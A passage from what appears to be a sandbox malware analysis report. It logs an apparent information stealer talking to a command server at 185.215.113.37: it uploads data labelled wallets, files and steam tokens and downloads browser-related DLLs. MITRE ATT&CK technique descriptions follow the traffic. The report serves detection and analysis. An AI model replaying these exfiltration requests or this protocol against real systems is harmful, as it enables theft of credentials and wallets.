name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="message"plugins------CFIEBKEHCAKFCBFIDAAK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="message"fplugins------KFBAECBAEGDGDHIEHIJJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBFHost: 185.215.113.37Content-Length: 7075Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAAHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 2d 2d 0d 0a Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="file"------HIJEGIIJDGHDGCBGHCAA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 2d 2d 0d 0a Data Ascii: ------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="file"------GIIJEBAECGCBKECAAAEB--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHCBGHJEGHJJKFHIIEHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGDBAFHJJDAKEBGCFCBHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 2d 2d 0d 0a Data Ascii: ------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="message"wallets------AEGDBAFHJJDAKEBGCFCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJEHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="message"files------JJJDGIECFCAKKFHIIIJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 2d 2d 0d 0a Data Ascii: ------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="file"------FCFBFHIEBKJKFHIEBFBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHCGCGDAAKFIECFHDBHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 2d 2d 0d 0a Data Ascii: ------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="message"ybncbhylepme------DBFHCGCGDAAKFIECFHDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDAHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JEGHDAFIDGDAAKEBFHDA--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

